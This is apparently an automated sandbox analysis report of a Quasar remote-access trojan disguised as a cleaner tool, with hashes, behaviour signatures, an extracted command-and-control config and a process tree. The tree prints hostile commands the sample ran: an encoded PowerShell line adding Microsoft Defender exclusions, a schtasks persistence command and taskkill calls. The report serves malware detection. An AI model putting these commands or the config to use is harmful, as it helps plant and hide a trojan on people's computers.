Analysis
-
max time kernel
594s -
max time network
599s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-01-2025 23:36
Static task
static1
Behavioral task
behavioral1
Sample
applecleaner (1).exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
applecleaner (1).exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral3
Sample
applecleaner (1).exe
Resource
win11-20241007-en
General
-
Target
applecleaner (1).exe
-
Size
6.7MB
-
MD5
cad8354da177706b2d48dd9d0642d9f0
-
SHA1
ea69a1e3cf00894543bb40f5ee4251439e3b2252
-
SHA256
62fc499b88eeb0334509ede6bba0f67dcdce5eb7954e5cbd2adfaabc0e2d405e
-
SHA512
f9dc85730ee4e729358a9acf3d5ace4aa146f16736dd368308c2feb4ee876d0a60b586907aa556ea357459eeb2c678451667ae4bb5dee3e94c2ca39719945f78
-
SSDEEP
196608:3pm+PJQbtnYGscd8rQcDw9Le+3L+cES9SDI:3pm2MnYG96jR+3LM
Malware Config
Extracted
quasar
1.4.1
retigga
192.168.1.90:4782
a44d3f31-890a-4898-b165-c2376c429bdc
-
encryption_key
44D22D01383E73D0D2E9F33669A5C563ECE6903D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000023b65-12.dat family_quasar behavioral1/memory/2272-26-0x0000000000990000-0x0000000000CB4000-memory.dmp family_quasar -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ applecleaner.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion applecleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion applecleaner.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation applecleaner (1).exe -
Executes dropped EXE 3 IoCs
pid Process 3104 applecleaner.exe 2272 Client-built.exe 2960 Client.exe -
resource yara_rule behavioral1/files/0x000b000000023b60-4.dat themida behavioral1/memory/3104-9-0x00007FF664CE0000-0x00007FF665673000-memory.dmp themida behavioral1/memory/3104-42-0x00007FF664CE0000-0x00007FF665673000-memory.dmp themida behavioral1/memory/3104-41-0x00007FF664CE0000-0x00007FF665673000-memory.dmp themida behavioral1/memory/3104-40-0x00007FF664CE0000-0x00007FF665673000-memory.dmp themida behavioral1/memory/3104-43-0x00007FF664CE0000-0x00007FF665673000-memory.dmp themida behavioral1/memory/3104-77-0x00007FF664CE0000-0x00007FF665673000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA applecleaner.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3104 applecleaner.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language applecleaner (1).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2588 cmd.exe -
Kills process with taskkill 3 IoCs
pid Process 4384 taskkill.exe 5028 taskkill.exe 3600 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 516 schtasks.exe 4012 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3864 powershell.exe 3864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2272 Client-built.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeDebugPrivilege 4384 taskkill.exe Token: SeDebugPrivilege 2960 Client.exe Token: SeDebugPrivilege 5028 taskkill.exe Token: SeDebugPrivilege 3600 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2960 Client.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 4640 wrote to memory of 3864 4640 applecleaner (1).exe 84 PID 4640 wrote to memory of 3864 4640 applecleaner (1).exe 84 PID 4640 wrote to memory of 3864 4640 applecleaner (1).exe 84 PID 4640 wrote to memory of 3104 4640 applecleaner (1).exe 86 PID 4640 wrote to memory of 3104 4640 applecleaner (1).exe 86 PID 4640 wrote to memory of 2272 4640 applecleaner (1).exe 88 PID 4640 wrote to memory of 2272 4640 applecleaner (1).exe 88 PID 3104 wrote to memory of 1148 3104 applecleaner.exe 89 PID 3104 wrote to memory of 1148 3104 applecleaner.exe 89 PID 1148 wrote to memory of 4384 1148 cmd.exe 90 PID 1148 wrote to memory of 4384 1148 cmd.exe 90 PID 2272 wrote to memory of 516 2272 Client-built.exe 91 PID 2272 wrote to memory of 516 2272 Client-built.exe 91 PID 2272 wrote to memory of 2960 2272 Client-built.exe 94 PID 2272 wrote to memory of 2960 2272 Client-built.exe 94 PID 3104 wrote to memory of 2588 3104 applecleaner.exe 95 PID 3104 wrote to memory of 2588 3104 applecleaner.exe 95 PID 2588 wrote to memory of 5028 2588 cmd.exe 96 PID 2588 wrote to memory of 5028 2588 cmd.exe 96 PID 3104 wrote to memory of 808 3104 applecleaner.exe 97 PID 3104 wrote to memory of 808 3104 applecleaner.exe 97 PID 808 wrote to memory of 3600 808 cmd.exe 98 PID 808 wrote to memory of 3600 808 cmd.exe 98 PID 2960 wrote to memory of 4012 2960 Client.exe 99 PID 2960 wrote to memory of 4012 2960 Client.exe 99 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\applecleaner (1).exe"C:\Users\Admin\AppData\Local\Temp\applecleaner (1).exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAaABuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAdwBoACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Users\Admin\AppData\Local\Temp\applecleaner.exe"C:\Users\Admin\AppData\Local\Temp\applecleaner.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\system32\taskkill.exetaskkill /f /im FortniteClient-Win64-Shipping.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Battle.net.exe >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\system32\taskkill.exetaskkill /f /im Battle.net.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:516
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4012
-
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Obfuscated Files or Information
1Command Obfuscation
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD56453142cfb0e786c06e25d3e844e09b6
SHA19262b0721295b5b7467d81f8ca4ce49d402b3a6d
SHA256f6a894441fc6b6fee1bc6dcce6515da3f113abe89ff69fba219795887c2a8e8e
SHA51206168bd38aea958a1c929e7660c09c62eae713af29e2967b728d8e29244798294b830f2392cc4ff32665e4c3112e9de2cfb0db73dca537b717521f76f03cbd1e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.6MB
MD522dd2356db64b549a2b3b6acde0c0c38
SHA1e6a313207fe182486c495bbfd22d1c39037528e5
SHA2564fc5a913380bc5b9e54b38fcf5735272aa84b74108d6b949bbedf39ae2789233
SHA5122208d5b7f903967883dba234caa45422a1df48dc0b6b4ce9eae172b1dd8f8ac7ecf2a150f70f2eb95971bbbd099f343f184cb4785befcf793617dd2722fe417b